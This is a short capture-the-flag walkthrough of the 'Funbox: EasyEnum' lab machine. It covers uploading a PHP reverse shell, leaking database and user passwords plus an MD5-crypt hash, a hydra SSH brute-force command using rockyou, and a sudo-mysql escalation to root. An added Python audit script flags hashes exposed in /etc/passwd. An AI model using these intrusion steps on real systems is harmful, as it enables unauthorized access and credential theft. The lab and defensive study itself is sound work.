Funbox: EasyEnum
192.168.1.136
Port scan
22/tcp open ssh syn-ack ttl 64 OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
80/tcp open http syn-ack ttl 64 Apache httpd 2.4.29 ((Ubuntu))
Found mini.php, which is some mini shell.
I was able to upload php-reverse-shell.php and get a shell as www-data.
Upgrade the shell:
python3 -c 'import pty; pty.spawn("/bin/bash")'
export TERM=xterm
Privesc from www-data
/etc/passwd:oracle:$1$|O@GOeN\$PGb9VNu29e9s6dMNJKH/R0:1004:1004:,,,:/home/oracle:/bin/bash
dbpass=tgbzhnujm
dbuser=phpmyadmin
ssh oracle@192.168.1.136
hiphop
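From the defender's side, the oracle entry above is exposed because its hash sits in the world-readable /etc/passwd rather than /etc/shadow, and the $1$ prefix marks MD5-crypt. The following audit is an added example, not part of the original write-up; the sample lines and the user names svc, nopw and locked are constructed.

```python
"""Audit passwd(5)-format text for password hashes kept outside /etc/shadow."""

# crypt(3) scheme prefixes mapped to (name, considered weak today).
SCHEMES = {
    "$1$": ("md5crypt", True),
    "$2": ("bcrypt", False),
    "$5$": ("sha256crypt", False),
    "$6$": ("sha512crypt", False),
    "$y$": ("yescrypt", False),
}

# Constructed sample input, not copied from the target machine.
SAMPLE = """\
root:x:0:0:root:/root:/bin/bash
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
svc:$1$CONSTRUC$0000000000000000000000:1004:1004:,,,:/home/svc:/bin/bash
nopw::1005:1005::/home/nopw:/bin/bash
locked:*:1006:1006::/home/locked:/bin/false
"""

def classify(field):
    """Return a finding for a passwd password field, or None if it is fine."""
    if field == "":
        return "empty password field"
    if field == "x" or field[0] in "*!":
        return None  # hash is in /etc/shadow, or the account is locked
    for prefix, (name, weak) in SCHEMES.items():
        if field.startswith(prefix):
            return f"world-readable {name} hash" + (" (weak scheme)" if weak else "")
    return "world-readable hash (legacy DES or unknown scheme)"

def audit(text):
    """Return (user, finding) pairs for entries that expose or lack a password."""
    findings = []
    for line in text.splitlines():
        if not line or line.startswith("#"):
            continue
        parts = line.split(":")
        if len(parts) != 7:
            findings.append((parts[0], "malformed entry"))
            continue
        finding = classify(parts[1])
        if finding:
            findings.append((parts[0], finding))
    return findings

if __name__ == "__main__":
    for user, finding in audit(SAMPLE):
        print(f"{user}: {finding}")
```

On a real host, pass the contents of /etc/passwd to audit() and move any flagged hash into /etc/shadow (pwconv does this) before resetting the password.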
Privesc
linpeas discovered a few users that were previously logged in. I added their usernames to users.txt then brute forced.
hydra -u -L users.txt -P /usr/share/wordlists/rockyou.txt 192.168.1.136 ssh
The user goat is allowed to run mysql with sudo privs.
GTFOBins to the rescue.
Root